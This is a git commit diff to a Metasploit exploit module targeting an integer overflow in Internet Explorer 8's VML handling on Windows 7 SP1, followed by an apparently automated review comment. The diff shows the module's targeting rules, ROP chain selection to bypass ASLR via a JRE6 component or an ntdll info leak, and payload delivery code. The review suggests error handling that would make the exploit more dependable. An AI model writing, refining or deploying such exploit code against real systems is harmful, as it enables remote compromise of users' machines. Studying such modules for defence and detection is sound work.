Working version after the upgrade

bug/bundler_fix
sinn3r 2015-01-27 12:02:36 -06:00
parent 9e3388df34
commit 2dedaee9ca
1 changed files with 24 additions and 15 deletions


@ -28,18 +28,25 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits an integer overflow vulnerability on Internet Explorer.
The vulnerability exists in the handling of the dashstyle.array length for vml
shapes on the vgx.dll module. This module has been tested successfully on Windows 7
SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target
to use an info leak to disclose the ntdll.dll base address is provided. This target
requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1
installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).
shapes on the vgx.dll module.
This module has been built and tested specifically against Windows 7 SP1 with
Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
bypass ASLR, and by default the info leak is used. The ntdll version should be
either v6.1.7601.17514 (the default dll version on a newly installed/unpatched
Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001).
If you wish to try the JRE6 component instead to bypass ASLR, you can set the
advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
have this particular component, the exploit will refuse the attack.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Joly', # Vulnerability discovery, PoC and analysis
'4B5F5F4B', # PoC
'juan vazquez' # Metasploit module
'juan vazquez', # Metasploit module
'sinn3r' # BES upgrade
],
'References' =>
[
@ -61,10 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'BrowserRequirements' =>
{
:source => /script/i,
:os_name => OperatingSystems::WINDOWS,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => HttpClients::IE,
:ua_ver => '8.0',
},
@ -181,10 +189,10 @@ for (var i=1; i < 0x300; i++) {
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
return code if t.opts['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
case t.opts['Rop']
when :jre
print_status("Using JRE ROP")
stack_pivot = [
@ -363,13 +371,13 @@ function exploit(){
def set_rop(t, rop, info)
case rop
when /^ntdll$/i
t['Rop'] = :ntdll
t.opts['Rop'] = :ntdll
when /^jre6$/i
if info[:java] !~ /1\.6|6\.0/
raise RuntimeError, "Target does not have the suitable Java component installed for our attack"
raise RuntimeError, "Target does not have the suitable Java component (1.6) installed for our attack"
end
t['Rop'] = :jre
t.opts['Rop'] = :jre
end
return t
@ -379,11 +387,12 @@ function exploit(){
begin
my_target = set_rop(get_target, datastore['ROP'], target_info)
rescue RuntimeError => e
print_error(e.message)
# This one is just a warning, because it's a requirement check so it's not that scary.
print_warning(e.message)
return
end
if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
if my_target.opts['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
html = html_info_leak
print_status("Sending HTML to info leak...")
send_response(cli, html, {'Content-Type'=>'text/html'})
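Review bot: In the `def set_rop(t, rop, info)` hunk, the `case rop` still has no `else` branch, so any `ROP` value other than `ntdll`/`jre6` leaves `t.opts['Rop']` nil and the request silently falls through to the `return code if t.opts['Rop'].nil?` path in get_payload, shipping a payload with no ROP chain against a target the description says is Windows 7 (DEP on); the method's closing `end` lies outside the hunk. If the `ROP` option is an enum restricted to those two values this cannot trigger, but that is not visible here, and a loud failure is cheap since on_request_exploit already rescues RuntimeError and prints it as a warning: `else` / `raise RuntimeError, "Unsupported ROP option: #{rop}"`. Note also that `t.opts['Rop']` writes into the target object returned by `get_target`, which presumably is the module's shared Target instance, so the choice persists across clients; a comment such as `# NOTE: mutates the shared target's opts; ROP is a per-run datastore choice, not per-client` would make that intent explicit.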